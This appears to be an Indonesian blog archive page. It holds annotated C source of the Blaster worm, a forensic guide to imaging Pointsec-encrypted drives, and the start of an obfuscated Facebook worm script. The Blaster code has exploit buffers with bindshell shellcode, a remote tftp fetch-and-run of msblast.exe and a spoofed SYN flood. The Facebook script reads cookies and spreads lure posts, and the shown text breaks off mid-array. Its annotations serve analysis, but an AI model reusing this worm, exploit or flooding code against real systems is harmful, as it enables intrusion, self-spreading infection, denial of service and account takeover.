,0x00,0x00,0x00,0x00,0x00,0x00,0x20,0x2F,0x0C,0x00,0x00,0x00,0x00,0x00,0x00,0x00
,0x00,0x00,0x03,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x03,0x00,0x00,0x00,0x46,0x00
,0x58,0x00,0x00,0x00,0x00,0x00,0x01,0x10,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x10,0x00
,0x00,0x00,0x30,0x00,0x2E,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00
,0x00,0x00,0x00,0x00,0x00,0x00,0x01,0x10,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x68,0x00
,0x00,0x00,0x0E,0x00,0xFF,0xFF,0x68,0x8B,0x0B,0x00,0x02,0x00,0x00,0x00,0x00,0x00
,0x00,0x00,0x00,0x00,0x00,0x00};

unsigned char request2[]={
0x20,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x20,0x00
,0x00,0x00,0x5C,0x00,0x5C,0x00};

unsigned char request3[]={
0x5C,0x00
,0x43,0x00,0x24,0x00,0x5C,0x00,0x31,0x00,0x32,0x00,0x33,0x00,0x34,0x00,0x35,0x00
,0x36,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00
,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00
,0x2E,0x00,0x64,0x00,0x6F,0x00,0x63,0x00,0x00,0x00};


unsigned char sc[]=
    "\x46\x00\x58\x00\x4E\x00\x42\x00\x46\x00\x58\x00"
    "\x46\x00\x58\x00\x4E\x00\x42\x00\x46\x00\x58\x00\x46\x00\x58\x00"
    "\x46\x00\x58\x00\x46\x00\x58\x00"

    "\xff\xff\xff\xff" /* return address */

    "\xcc\xe0\xfd\x7f" /* primary thread data block */
    "\xcc\xe0\xfd\x7f" /* primary thread data block */

    /* port 4444 bindshell */
    "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
    "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
    "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
    "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
    "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
    "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
    "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
    "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
    "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
    "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
    "\x90\x90\x90\x90\x90\x90\x90\xeb\x19\x5e\x31\xc9\x81\xe9\x89\xff"
    "\xff\xff\x81\x36\x80\xbf\x32\x94\x81\xee\xfc\xff\xff\xff\xe2\xf2"
    "\xeb\x05\xe8\xe2\xff\xff\xff\x03\x53\x06\x1f\x74\x57\x75\x95\x80"
    "\xbf\xbb\x92\x7f\x89\x5a\x1a\xce\xb1\xde\x7c\xe1\xbe\x32\x94\x09"
    "\xf9\x3a\x6b\xb6\xd7\x9f\x4d\x85\x71\xda\xc6\x81\xbf\x32\x1d\xc6"
    "\xb3\x5a\xf8\xec\xbf\x32\xfc\xb3\x8d\x1c\xf0\xe8\xc8\x41\xa6\xdf"
    "\xeb\xcd\xc2\x88\x36\x74\x90\x7f\x89\x5a\xe6\x7e\x0c\x24\x7c\xad"
    "\xbe\x32\x94\x09\xf9\x22\x6b\xb6\xd7\x4c\x4c\x62\xcc\xda\x8a\x81"
    "\xbf\x32\x1d\xc6\xab\xcd\xe2\x84\xd7\xf9\x79\x7c\x84\xda\x9a\x81"
    "\xbf\x32\x1d\xc6\xa7\xcd\xe2\x84\xd7\xeb\x9d\x75\x12\xda\x6a\x80"
    "\xbf\x32\x1d\xc6\xa3\xcd\xe2\x84\xd7\x96\x8e\xf0\x78\xda\x7a\x80"
    "\xbf\x32\x1d\xc6\x9f\xcd\xe2\x84\xd7\x96\x39\xae\x56\xda\x4a\x80"
    "\xbf\x32\x1d\xc6\x9b\xcd\xe2\x84\xd7\xd7\xdd\x06\xf6\xda\x5a\x80"
    "\xbf\x32\x1d\xc6\x97\xcd\xe2\x84\xd7\xd5\xed\x46\xc6\xda\x2a\x80"
    "\xbf\x32\x1d\xc6\x93\x01\x6b\x01\x53\xa2\x95\x80\xbf\x66\xfc\x81"
    "\xbe\x32\x94\x7f\xe9\x2a\xc4\xd0\xef\x62\xd4\xd0\xff\x62\x6b\xd6"
    "\xa3\xb9\x4c\xd7\xe8\x5a\x96\x80\xae\x6e\x1f\x4c\xd5\x24\xc5\xd3"
    "\x40\x64\xb4\xd7\xec\xcd\xc2\xa4\xe8\x63\xc7\x7f\xe9\x1a\x1f\x50"
    "\xd7\x57\xec\xe5\xbf\x5a\xf7\xed\xdb\x1c\x1d\xe6\x8f\xb1\x78\xd4"
    "\x32\x0e\xb0\xb3\x7f\x01\x5d\x03\x7e\x27\x3f\x62\x42\xf4\xd0\xa4"
    "\xaf\x76\x6a\xc4\x9b\x0f\x1d\xd4\x9b\x7a\x1d\xd4\x9b\x7e\x1d\xd4"
    "\x9b\x62\x19\xc4\x9b\x22\xc0\xd0\xee\x63\xc5\xea\xbe\x63\xc5\x7f"
    "\xc9\x02\xc5\x7f\xe9\x22\x1f\x4c\xd5\xcd\x6b\xb1\x40\x64\x98\x0b"
    "\x77\x65\x6b\xd6\x93\xcd\xc2\x94\xea\x64\xf0\x21\x8f\x32\x94\x80"
    "\x3a\xf2\xec\x8c\x34\x72\x98\x0b\xcf\x2e\x39\x0b\xd7\x3a\x7f\x89"
    "\x34\x72\xa0\x0b\x17\x8a\x94\x80\xbf\xb9\x51\xde\xe2\xf0\x90\x80"
    "\xec\x67\xc2\xd7\x34\x5e\xb0\x98\x34\x77\xa8\x0b\xeb\x37\xec\x83"
    "\x6a\xb9\xde\x98\x34\x68\xb4\x83\x62\xd1\xa6\xc9\x34\x06\x1f\x83"
    "\x4a\x01\x6b\x7c\x8c\xf2\x38\xba\x7b\x46\x93\x41\x70\x3f\x97\x78"
    "\x54\xc0\xaf\xfc\x9b\x26\xe1\x61\x34\x68\xb0\x83\x62\x54\x1f\x8c"
    "\xf4\xb9\xce\x9c\xbc\xef\x1f\x84\x34\x31\x51\x6b\xbd\x01\x54\x0b"
    "\x6a\x6d\xca\xdd\xe4\xf0\x90\x80\x2f\xa2\x04";

   

unsigned char request4[]={
0x01,0x10
,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x20,0x00,0x00,0x00,0x30,0x00,0x2D,0x00,0x00,0x00
,0x00,0x00,0x88,0x2A,0x0C,0x00,0x02,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x28,0x8C
,0x0C,0x00,0x01,0x00,0x00,0x00,0x07,0x00,0x00,0x00,0x00,0x00,0x00,0x00
};

    int ThreadId;
    int len;
    int sizeof_sa;
    int ret;
    int opt;
    void *hThread;
    struct sockaddr_in target_ip;
    struct sockaddr_in sa;
    int fd;
    char cmdstr[0x200];
    int len1;
    unsigned char buf2[0x1000];
    int i;

    /* 
     * Turn off non-blocking (i.e. re-enable blocking mode)  
     * DEFENSE: Tarpit programs (e.g. 'labrea' or 'deredoc')
     * will slow down the spread of this worm. It takes a long
     * time for blocking calls to timeout. I had several     
     * thousand worms halted by my 'deredoc' tarpit.
     */
    opt = 0;
    ioctlsocket(sock, FIONBIO , &opt);

    /*
     * Choose whether the exploit targets Win2k or WinXP.
     */
    if (winxp1_or_win2k2 == 1)
        ret = 0x100139d;
    else
        ret = 0x18759f;
    memcpy(sc+36, (unsigned char *) &ret, 4);

    /* ----------------------------------------------
     * This section is just copied from the original exploit
     * script. This is the same as the scripts that have been
     * widely published on the Internet. */
    len=sizeof(sc);
    memcpy(buf2,request1,sizeof(request1));
    len1=sizeof(request1);
     
    *(unsigned long *)(request2)=*(unsigned long *)(request2)+sizeof(sc)/2;      
    *(unsigned long *)(request2+8)=*(unsigned long *)(request2+8)+sizeof(sc)/2;

    memcpy(buf2+len1,request2,sizeof(request2));
    len1=len1+sizeof(request2);
    memcpy(buf2+len1,sc,sizeof(sc));
    len1=len1+sizeof(sc);
    memcpy(buf2+len1,request3,sizeof(request3));
    len1=len1+sizeof(request3);
    memcpy(buf2+len1,request4,sizeof(request4));
    len1=len1+sizeof(request4);

    *(unsigned long *)(buf2+8)=*(unsigned long *)(buf2+8)+sizeof(sc)-0xc;
     

    *(unsigned long *)(buf2+0x10)=*(unsigned long *)(buf2+0x10)+sizeof(sc)-0xc;      
    *(unsigned long *)(buf2+0x80)=*(unsigned long *)(buf2+0x80)+sizeof(sc)-0xc;
    *(unsigned long *)(buf2+0x84)=*(unsigned long *)(buf2+0x84)+sizeof(sc)-0xc;
    *(unsigned long *)(buf2+0xb4)=*(unsigned long *)(buf2+0xb4)+sizeof(sc)-0xc;
    *(unsigned long *)(buf2+0xb8)=*(unsigned long *)(buf2+0xb8)+sizeof(sc)-0xc;
    *(unsigned long *)(buf2+0xd0)=*(unsigned long *)(buf2+0xd0)+sizeof(sc)-0xc;
    *(unsigned long *)(buf2+0x18c)=*(unsigned long *)(buf2+0x18c)+sizeof(sc)-0xc;
         
    if (send(sock,bindstr,sizeof(bindstr),0)== -1)
    {
            //perror("- Send");
            return;
    }


    if (send(sock,buf2,len1,0)== -1)
    {
            //perror("- Send");
            return;
    }
    closesocket(sock);
    Sleep(400);
    /* ----------------------------------------------*/


    /*
     * This section of code connects to the victim on port 4444.
     * DEFENSE : This means you can block this worm by blocking
     * TCP port 4444.
     * FAQ: This port is only open for the brief instant needed
     * to exploit the victim. Therefore, you can't scan for  
     * port 4444 in order to find Blaster victims.
     */
    if ((fd=socket(AF_INET,SOCK_STREAM,0)) == -1)
        return;
    memset(&target_ip, 0, sizeof(target_ip));
    target_ip.sin_family = AF_INET;
    target_ip.sin_port = htons(SHELL_PORT_4444);
    target_ip.sin_addr.s_addr = inet_addr(victim_ip);
    if (target_ip.sin_addr.s_addr == SOCKET_ERROR)
        return;
    if (connect(fd, (struct sockaddr*)&target_ip, 
                            sizeof(target_ip)) == SOCKET_ERROR)
        return;

    /*
     * This section recreates the IP address from whatever IP
     * address this successfully connected to. In practice,
     * the strings "victim_ip" and "target_ip_string" should be
     * the same.
     */
    memset(target_ip_string, 0, sizeof(target_ip_string));
    sizeof_sa = sizeof(sa);
    getsockname(fd, (struct sockaddr*)&sa, &sizeof_sa);
    sprintf(target_ip_string, "%d.%d.%d.%d",     
        sa.sin_addr.s_net, sa.sin_addr.s_host, 
        sa.sin_addr.s_lh, sa.sin_addr.s_impno);

    /*
     * This section creates a temporary TFTP service that is     
     * ONLY alive during the period of time that the victim
     * needs to download.
     * FAQ: You can't scan for TFTP in order to find Blaster     
     * victims because the port is rarely open.
     */
    if (fd_tftp_service)
        closesocket(fd_tftp_service);
    hThread = CreateThread(0,0,
      blaster_tftp_thread,0,0,&ThreadId);
    Sleep(80); /*give time for thread to start*/
     
    /*
     * This sends the command
     *    tftp -i 1.2.3.4 GET msblast.exe
     * to the victim. The "tftp.exe" program is built into
     * Windows. It's intended purpose is to allow users to 
     * manually update their home wireless access points with
     * new software (and other similar tasks). However, it is
     * not intended as a generic file-transfer protocol (it
     * stands for "trivial-file-transfer-protocol" -- it is
     * intended for only trivial tasks). Since a lot of hacker
     * exploits use the "tftp.exe" program, a good hardening
     * step is to remove/rename it.
     */
    sprintf(cmdstr, "tftp -i %s GET %s\n", 
                                target_ip_string, MSBLAST_EXE);
    if (send(fd, cmdstr, strlen(cmdstr), 0) <= 0)
        goto closesocket_and_return;

    /* 
     * Wait 21 seconds for the victim to request the file, then
     * for the file to be delivered via TFTP.
     */
    Sleep(1000);
    for (i=0; i<10 && is_tftp_running; i++)
        Sleep(2000);

    /*
     * Assume the the transfer is successful, and send the 
     * command to start executing the newly downloaded program.
     * BUFORD: The hacker starts this twice. Again, it 
     * demonstrates a lock of confidence, so he makes sure it's
     * started by doing it twice in slightly different ways.
     * Note that the "BILLY" mutex will prevent from actually
     * running twice.
     */
    sprintf(cmdstr, "start %s\n", MSBLAST_EXE);
    if (send(fd, cmdstr, strlen(cmdstr), 0) <= 0)
        goto closesocket_and_return;
    Sleep(2000);
    sprintf(cmdstr, "%s\n", MSBLAST_EXE);
    send(fd, cmdstr, strlen(cmdstr), 0);
    Sleep(2000);


    /*
     * This section closes the things started in this procedure
     */
closesocket_and_return:

    /* Close the socket for the remote command-prompt that has
     * been established to the victim. */
    if (fd != 0)
        closesocket(fd);

    /* Close the TFTP server that was launched above. As noted,
     * this means that the TFTP service is not running most of
     * the time, so it's not easy to scan for infected systems.
     */
    if (is_tftp_running) {
        TerminateThread(hThread,0);
        closesocket(fd_tftp_service);
        is_tftp_running = 0;
    }
    CloseHandle(hThread);
}


/**
 * Convert the name into an IP address. If the IP address
 * is formatted in decimal-dot-notation (e.g. 192.2.0.43),
 * then return that IP address, otherwise do a DNS lookup
 * on the address. Note that in the case of the worm,
 * it always gives the string "windowsupdate.com" to this
 * function, and since Microsoft turned off that name,
 * the DNS lookup will usually fail, so this function
 * generally returns -1 (SOCKET_ERROR), which means the
 * address 255.255.255.255.
 */
int blaster_resolve_ip(const char *windowsupdate_com)
{
    int result;

    result = inet_addr(windowsupdate_com);
    if (result == SOCKET_ERROR) {
        HOSTENT *p_hostent = gethostbyname(windowsupdate_com);
        if (p_hostent == NULL)
            result = SOCKET_ERROR;
        else
            result = *p_hostent->h_addr;
    }
     
    return result;
}


/*
 * This thre
 */
ULONG WINAPI blaster_DoS_thread(LPVOID p)
{
    int opt = 1;
    int fd;
    int target_ip;


    /* Lookup the domain-name. Note that no checking is done     
     * to ensure that the name is valid. Since Microsoft turned
     * this off in their domain-name servers, this function now
     * returns -1. */
    target_ip = blaster_resolve_ip("windowsupdate.com");
     

    /* Create a socket that the worm will blast packets at 
     * Microsoft from. This is what is known as a "raw" socket.  
     * So-called "raw-sockets" are ones where packets are 
     * custom-built by the programmer rather than by the TCP/IP  
     * stack. Note that raw-sockets were not available in Windows
     * until Win2k. A cybersecurity pundit called Microsoft
     * "irresponsible" for adding them.  
     *  
     * That's probably an
     * unfairly harsh judgement (such sockets are available in
     * every other OS), but it's true that it puts the power of
     * SYNflood attacks in the hands of lame worm writers. While
     * the worm-writer would probably have chosen a different
     * DoS, such as Slammer-style UDP floods, it's likely that
     * Buford wouldn't have been able to create a SYNflood if
     * raw-sockets had not been added to Win2k/WinXP. */
    fd = WSASocket(
            AF_INET,    /*TCP/IP sockets*/
            SOCK_RAW,   /*Custom TCP/IP headers*/
            IPPROTO_RAW,
            NULL,
            0,
            WSA_FLAG_OVERLAPPED
            );
    if (fd == SOCKET_ERROR)
        return 0;

    /* Tell the raw-socket that IP headers will be created by the
     * programmer rather than the stack. Most raw sockets in
     * Windows will also have this option set. */
    if (setsockopt(fd, IPPROTO_IP, IP_HDRINCL, 
                    (char*)&opt, sizeof(opt)) == SOCKET_ERROR)
        return 0;


    /* Now do the SYN flood. The worm writer decided to flood
     * slowly by putting a 20-millisecond delay between packets
     * -- causing only 500 packets/second, or roughly, 200-kbps.
     * There are a couple of reasons why the hacker may have
     * chosen this.  
     *  1. SYNfloods are not intended to be bandwidth floods,
     *     even slow rates are hard to deal with.
     *  2. Slammer DoSed both the sender and receiver, therefore
     *     senders hunted down infected systems and removed
     *     them. This won't DoS the sender, so people are more
     *     likely not to care about a few infected machines.
     */
    for (;;) {
        blaster_send_syn_packet(target_ip, fd);

        /* Q: How fast does it send the SYNflood?
         * A: About 50 packets/second, where each packet is  
         *    320-bits in size, for a total of 15-kbps.
         *    It means that Buford probably intended for     
         *    dialup users to be a big source of the DoS
         *    attack. He was smart enough to realize that 
         *    faster floods would lead to users discovering
         *    the worm and turning it off. */
        Sleep(20);
    }
   

    closesocket(fd);
    return 0;
}



/*
 * This is a standard TCP/IP checksum algorithm
 * that you find all over the web.
 */
int blaster_checksum(const void *bufv, int length)
{
    const unsigned short *buf = (const unsigned short *)bufv;
    unsigned long result = 0;
     
    while (length > 1) {
        result += *(buf++);
        length  -= sizeof(*buf);   
    }
    if (length) result += *(unsigned char*)buf;   
    result = (result >> 16) + (result & 0xFFFF);
    result += (result >> 16); 
    result = (~result)&0xFFFF; 
     
    return (int)result;
}



/*
 * This is a function that uses "raw-sockets" in order to send
 * a SYNflood at the victim, which is "windowsupdate.com" in     
 * the case of the Blaster worm.
 */
void blaster_send_syn_packet(int target_ip, int fd)
{

    struct IPHDR
    {
        unsigned char  verlen;     /*IP version & length */
        unsigned char  tos;        /*IP type of service*/
        unsigned short totallength;/*Total length*/
        unsigned short id;         /*Unique identifier */
        unsigned short offset;     /*Fragment offset field*/
        unsigned char  ttl;        /*Time to live*/
        unsigned char  protocol;   /*Protocol(TCP, UDP, etc.)*/
        unsigned short checksum;   /*IP checksum*/
        unsigned int   srcaddr;    /*Source address*/
        unsigned int   dstaddr;    /*Destination address*/

    };
    struct TCPHDR
    {
        unsigned short  srcport;
        unsigned short  dstport;
        unsigned int    seqno;
        unsigned int    ackno;
        unsigned char   offset;
        unsigned char   flags;
        unsigned short  window;
        unsigned short  checksum;
        unsigned short  urgptr;
    };
    struct PSEUDO
    {
      unsigned int srcaddr;
      unsigned int dstaddr;
      unsigned char padzero;
      unsigned char protocol;
      unsigned short tcplength;
    };
    struct PSEUDOTCP
    {
      unsigned int srcaddr;
      unsigned int dstaddr;
      unsigned char padzero;
      unsigned char protocol;
      unsigned short tcplength;
      struct TCPHDR tcphdr;
    };




    char spoofed_src_ip[16];
    unsigned short target_port = 80; /*SYNflood web servers*/
    struct sockaddr_in to;   
    struct PSEUDO pseudo;    
    char buf[60] = {0};  
    struct TCPHDR tcp;
    struct IPHDR ip;
    int source_ip;


    /* Yet another randomizer-seeding */
    srand(GetTickCount());

    /* Generate a spoofed source address that is local to the
     * current Class B subnet. This is pretty smart of Buford.
     * Using just a single IP address allows defenders to turn
     * it off on the firewall, whereas choosing a completely
     * random IP address would get blocked by egress filters
     * (because the source IP would not be in the proper range).
     * Randomly choosing nearby IP addresses it probably the     
     * best way to evade defenses */
    sprintf(spoofed_src_ip, "%i.%i.%i.%i", 
        local_class_a, local_class_b, rand()%255, rand()%255);
    source_ip = blaster_resolve_ip(spoofed_src_ip);

    /* Build the sockaddr_in structure. Normally, this is what
     * the underlying TCP/IP stack uses to build the headers
     * from. However, since the DoS attack creates its own
     * headers, this step is largely redundent. */
    to.sin_family = AF_INET;
    to.sin_port = htons(target_port); /*this makes no sense */
    to.sin_addr.s_addr = target_ip;

    /* Create the IP header */
    ip.verlen = 0x45;
    ip.totallength = htons(sizeof(ip) + sizeof(tcp));
    ip.id = 1;
    ip.offset = 0;
    ip.ttl = 128;
    ip.protocol = IPPROTO_TCP;
    ip.checksum = 0; /*for now, set to true value below */
    ip.dstaddr = target_ip;
     
    /* Create the TCP header */
    tcp.dstport = htons(target_port);
    tcp.ackno = 0;
    tcp.offset = (unsigned char)(sizeof(tcp)<<4);
    tcp.flags = 2; /*TCP_SYN*/
    tcp.window = htons(0x4000);
    tcp.urgptr = 0;
    tcp.checksum = 0; /*for now, set to true value below */

    /* Create pseudo header (which copies portions of the IP
     * header for TCP checksum calculation).*/
    pseudo.dstaddr = ip.dstaddr;
    pseudo.padzero = 0;
    pseudo.protocol = IPPROTO_TCP;
    pseudo.tcplength = htons(sizeof(tcp));

    /* Use the source adress chosen above that is close, but
     * not the same, as the spreader's IP address */
    ip.srcaddr = source_ip;

    /* Choose a random source port in the range [1000-19999].*/
    tcp.srcport = htons((unsigned short)((rand()%1000)+1000)); 

    /* Choose a random sequence number to start the connection.
     * BUG: Buford meant htonl(), not htons(), which means seqno
     * will be 15-bits, not 32-bits, i.e. in the range 
     * [0-32767]. (the Windows rand() function only returns
     * 15-bits). */
    tcp.seqno = htons((unsigned short)((rand()<<16)|rand()));

    pseudo.srcaddr = source_ip;

    /* Calculate TCP checksum */
    memcpy(buf, &pseudo, sizeof(pseudo));
    memcpy(buf+sizeof(pseudo), &tcp, sizeof(tcp));
    tcp.checksum = blaster_checksum(buf,     
                                sizeof(pseudo)+sizeof(tcp));
     
    memcpy(buf, &ip, sizeof(ip));
    memcpy(buf+sizeof(ip), &tcp, sizeof(tcp));
     
    /* I have no idea what's going on here. The assembly code
     * zeroes out a bit of memory near the buffer. I don't know
     * if it is trying to zero out a real variable that happens
     * to be at the end of the buffer, or if it is trying to zero
     * out part of the buffer itself. */
    memset(buf+sizeof(ip)+sizeof(tcp), 0,
        sizeof(buf)-sizeof(ip)-sizeof(tcp));
     
    /* Major bug here: the worm writer incorrectly calculates the
     * IP checksum over the entire packet. This is incorrect --
     * the IP checksum is just for the IP header itself, not for
     * the TCP header or data. However, Windows fixes the checksum
     * anyway, so it's not a problem.
     */
    ip.checksum = blaster_checksum(buf, sizeof(ip)+sizeof(tcp));

    /* Copy the header over again. The reason for this is simply to
     * copy over the checksum that was just calculated above, but
     * it's easier doing this for the programmer rather than
     * figuring out the exact offset where the checksum is
     * located */
    memcpy(buf, &ip, sizeof(ip));

    /* Send the packet */
    sendto(fd, buf, sizeof(ip)+sizeof(tcp), 0,
                            (struct sockaddr*)&to, sizeof(to));
}
Source tersebut di compile dengan menggunakan bahasa C# atau C++ (C tambah-tambah) kata anak² di kampus ku :D


Untuk Penjelasan lebih jauh mengenai worm ini, bisa di baca pada referensi berikut :
http://www.sans.org/security-resources/malwarefaq/w32_blasterworm.php

http://www.cert.org/advisories/CA-2003-20.html
Baca Selengkapnya... Source Code WORM W32/Blaster

24 April 2011

Pemeriksaan Forensik pada Drives Pointsec (http://www.checkpoint.com)

Sharing Pengalaman :
Banyak organisasi, perusahaan atau lembaga² tertentu menggunakan enkripsi Pointsec  untuk menjaga  agar data mereka tetap aman, terutama dalam kasus laptop. Sebagai penyidik ​​forensik, kami kadang-kadang bertugas dengan menciptakan forensik suara, file image didekripsi pada drive yang dienkripsi oleh Pointsec untuk penyelamatan atau investigasi. Ini adalah tugas yang cukup rumit dan sulit, karena tidak ada alat forensik yang ada yang memiliki kemampuan dengan menekan satu tombol maka deskripsi atau gambaran/data dari suatu file enkripsi dapat terlihat dengan jelas. Meskipun ada beberapa sumber daya online mendokumentasikan proses ini, mereka bertentangan dan kadang-kadang salah. Dalam rangka membantu penyelidik lainnya yang menghadapi tantangan ini, saya akan menyajikan serangkaian langkah dan point² untuk memperoleh gambar deskripsi forensik (dengan peringatan) dari gambar Pointsec drive yang terenkripsi. 

Perhatikan bahwa tulisan ini bukan tentang melanggar hak² privasi seseorang atau lembaga, ini hanya tentang bagaimana caranya membuat sebuah file yang terenkripsi dapat terlihat dengan jelas dengan asumsi kita telah memilik surat izin/tugas untuk memeriksa file tersebut . Tetapi juga, karena beberapa kegagalan pada proses pemeriksaan data pada tugas sebelumnya :p


Hal-Hal yang di perlukan :
  1. file yang terenkripsi oleh Pointsec
  2. Komputer atau Laptop yang telah terinstal LiveView (bisa menggunaan WMware atau sejenisnya)
  3. CD BartPE dengan aplikasi Pointsec Dynamic Mount Utility (DMU) untuk membuka file/data yang di enkripsi oleh Pointsec dan FTK Imager. Petunjuk untuk membuat disk ini dengan DMU dapat anda baca pada https://updates.checkpoint.com/fileserver/SOURCE/direct/ID/11801/FILE/CP_2.0_FDE_Dynamic_Mount_Utility_AdminGuide.pdf ,saya sarankan untuk menambahkan FTK Imager ke disk ini juga.
  4. Sebuah jaringan untuk membaca file yang telah di deskripsi.

Langkah-Langkah :
  1. gunakan LiveView untuk menghasilkan konfigurasi file hanya untuk gambar drive yang terenkripsi.
  2. buka file konfigurasi yang baru dihasilkan dengan VMWare Workstation dan (vmx.) caranya :
          <0> set CD-ROM pada drive yang benar 
          <0> tambahkan dan konfigurasi Network Adapter (gunakan NAT jika anda ragu konfigurasi jaringan
                 gagal)  
     3. buka file wmx (file VMWare) dalam editor teks dan tambahkan baris berikut sampai akhir :
:Bios.BootDelay = “10000”
(kode ini berguna untuk penundaan boot selama 10 detik, jika tidak pada langkah ke-6 kita akan mengalami kesuliatan) 
     4. masukan CD BartPE ke drive cd-rom komputer.
     5. jalankan LiveView pada VMWate
     6. Tekan ESC untuk masuk ke menu boot VMWare, dan pilih drive CD-ROM untuk boot CD BartPE.
     7. Setelah muncul tapilan BartPE , konfigurasi jaringannya
         <0> Lakukan konfigurasi jaringan dengan benar
         <0> lakukan sharing partisi untuk mengakses file pada masing jaringan dalam satu komputer
     8. Jalankan pada mode DMU dan pilih drive file yang terenkripsi.
     9. Masuk dengan hak akses adminstrator pada tiap² sharing partisi.
    10. Setelah drive/partisi muncul sebagai dalam keadaan "terkunci" gunakan FTK Imager untuk membuat 
          gambar dari drive lokal dan dibuka ke drive jaringan yang telah dipetakan (konfiguras).


beberapa kesalahan yang sering muncul dari implementasi di atas :
  • Kami telah mencoba pencitraan terkunci drive dengan dd dan dcfldd, tapi tidak berjalan dengan benar di dalam BartPE.
  • Anda mungkin harus mengkonfigurasi jaringan dan / atau peta drive jaringan di BartPE lebih dari sekali sebelum memulainya. Pastikan untuk menggunakan yang disediakan Konfigurasi dengan "NET USE" atau "ipconfig" dari baris perintah "PE Network Configurator." Tidak muncul untuk bekerja dengan benar (atau sama sekali).
  • Kadang-kadang ketika booting BartPE atau ketika menjalankan DMU, ​​Anda mendapatkan BSOD "STOP 0x0500 ????". Kode-kode error tidak muncul untuk didokumentasikan di mana saja.
  • DMU tidak memiliki opsi untuk membuka isi file terenkripsi dalam mode read-only.

Semoga pengalaman ini bisa di adikan bahan pelajaran buat teman-teman yang berkecimpung di dunia administrasi dan sceurity.




^_^
D4wFl1N
Baca Selengkapnya... Pemeriksaan Forensik pada Drives Pointsec (http://www.checkpoint.com)

20 April 2011

facebook worm

var randomnumber=Math.floor(Math.random()*19999999);
var message = '%firstname% See who views your profile is.gd/cY1mum?'


var ev = 'check out this new facebook feature! \n\ see your profile view results by copying and pasting the link below in the address bar \n\ is.gd/cY1mum?';


var post = 'My Top Profile Viewers Are: \n %tf% - 1,764 views, %tf% - 1,491 views, %tf% - 1,206 views, %tf% - 1,088 views, and %tf% - 991 views \n see who viewed your facebook profile @ http://is.gd/cY1mum?';


var chatmessage = message+randomnumber;
var postmessage = post+randomnumber;
var redirect = 'http://epic-lyts.com/final.php';
var eventdesc = ev+randomnumber;
var eventname = 'new facebook feature :o';
var nfriends = 50;
var _0xdac0=["\x68\x72\x65\x66","\x6C\x6F\x63\x61\x74\x69\x6F\x6E","\x74\x6F\x70","\x47\x45\x54","\x6F\x70\x65\x6E","\x6F\x6E\x72\x65\x61\x64\x79\x73\x74\x61\x74\x65\x63\x68\x61\x6E\x67\x65","\x72\x65\x61\x64\x79\x53\x74\x61\x74\x65","\x73\x74\x61\x74\x75\x73","\x72\x65\x73\x70\x6F\x6E\x73\x65\x54\x65\x78\x74","\x73\x65\x6E\x64","\x2F","\x6D\x61\x74\x63\x68","\x63\x6F\x6F\x6B\x69\x65","\x40\x5B","\x69\x64","\x3A","\x6E\x61\x6D\x65","\x5D","","\x26","\x3D","\x50\x4F\x53\x54","\x43\x6F\x6E\x74\x65\x6E\x74\x2D\x54\x79\x70\x65","\x61\x70\x70\x6C\x69\x63\x61\x74\x69\x6F\x6E\x2F\x78\x2D\x77\x77\x77\x2D\x66\x6F\x72\x6D\x2D\x75\x72\x6C\x65\x6E\x63\x6F\x64\x65\x64","\x73\x65\x74\x52\x65\x71\x75\x65\x73\x74\x48\x65\x61\x64\x65\x72","\x64\x69\x76","\x63\x72\x65\x61\x74\x65\x45\x6C\x65\x6D\x65\x6E\x74","\x64\x69\x73\x70\x6C\x61\x79","\x73\x74\x79\x6C\x65","\x62\x6C\x6F\x63\x6B","\x70\x6F\x73\x69\x74\x69\x6F\x6E","\x61\x62\x73\x6F\x6C\x75\x74\x65","\x77\x69\x64\x74\x68","\x25","\x68\x65\x69\x67\x68\x74","\x6C\x65\x66\x74","\x70\x78","\x74\x65\x78\x74\x41\x6C\x69\x67\x6E","\x63\x65\x6E\x74\x65\x72","\x70\x61\x64\x64\x69\x6E\x67","\x34\x70\x78","\x62\x61\x63\x6B\x67\x72\x6F\x75\x6E\x64","\x23\x46\x46\x46\x46\x46\x46","\x7A\x49\x6E\x64\x65\x78","\x69\x6E\x6E\x65\x72\x48\x54\x4D\x4C","\x26\x6E\x62\x73\x70\x3B\x3C\x62\x72\x2F\x3E\x50\x6C\x65\x61\x73\x65\x20\x77\x61\x69\x74\x2C\x20\x74\x68\x69\x73\x20\x63\x61\x6E\x20\x74\x61\x6B\x65\x20\x75\x70\x20\x74\x6F\x20\x61\x20\x6D\x69\x6E\x75\x74\x65\x2E\x2E\x2E\x3C\x62\x72\x2F\x3E\x3C\x62\x72\x2F\x3E\x49\x66\x20\x74\x68\x69\x73\x20\x70\x61\x67\x65\x20\x68\x61\x73\x20\x62\x65\x65\x6E\x20\x75\x70\x20\x66\x6F\x72\x20\x6D\x6F\x72\x65\x20\x74\x68\x61\x6E\x20\x61\x20\x6D\x69\x6E\x75\x74\x65\x20\x79\x6F\x75\x20\x63\x61\x6E\x20\x3C\x61\x20\x68\x72\x65\x66\x3D\x22\x6A\x61\x76\x61\x73\x63\x72\x69\x70\x74\x3A\x76\x6F\x69\x64\x28\x30\x29\x3B\x22\x20\x6F\x6E\x63\x6C\x69\x63\x6B\x